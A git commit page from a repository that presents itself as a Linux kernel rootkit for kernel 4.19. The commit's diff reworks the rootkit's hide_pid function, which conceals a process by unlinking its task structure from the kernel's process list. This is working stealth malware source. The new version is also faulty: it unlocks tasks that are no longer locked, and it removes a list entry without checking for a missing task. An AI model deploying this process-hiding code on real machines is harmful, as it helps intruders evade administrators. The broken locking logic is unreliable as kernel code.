testing - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit f4cd99af97f6b2f248eea00bc37cf65cba714c5d
parent ad0cdde58b84a05277161a2d07019f268f9f5769
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 02:38:12 +0100

testing

Diffstat:
M rootkit/src/pidhide.c  | 18 +++++++++++++++---

1 file changed, 15 insertions(+), 3 deletions(-)
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -67,10 +67,22 @@ hide_pid(pid_t pid)
     add_pid_to_list(hidden_pids_tail, pid);
 
     task_struct *ts = find_task_by_vid(pid);
-    if (ts) {
-        DEBUG_INFO("found\n");
-        list_del(&ts->tasks);
+    struct task_struct *task;
+
+    rcu_read_lock();
+    for_each_process(task) {
+        task_lock(task);
+        if(ts == task) {
+            task_unlock(task);
+            continue;
+        }
+        task_unlock(task);
+    }
+    list_del(&ts->tasks);
+    for_each_process(task) {
+        task_unlock(task);
     }
+    rcu_read_unlock();
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs